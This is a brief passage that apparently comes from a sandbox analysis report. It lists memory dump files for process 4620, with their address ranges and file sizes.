          Filesize

          472KB

        • memory/4620-77-0x0000000007A00000-0x0000000007A1A000-memory.dmp

          Filesize

          104KB

        • memory/4620-76-0x0000000008060000-0x00000000086DA000-memory.dmp

          Filesize

          6.5MB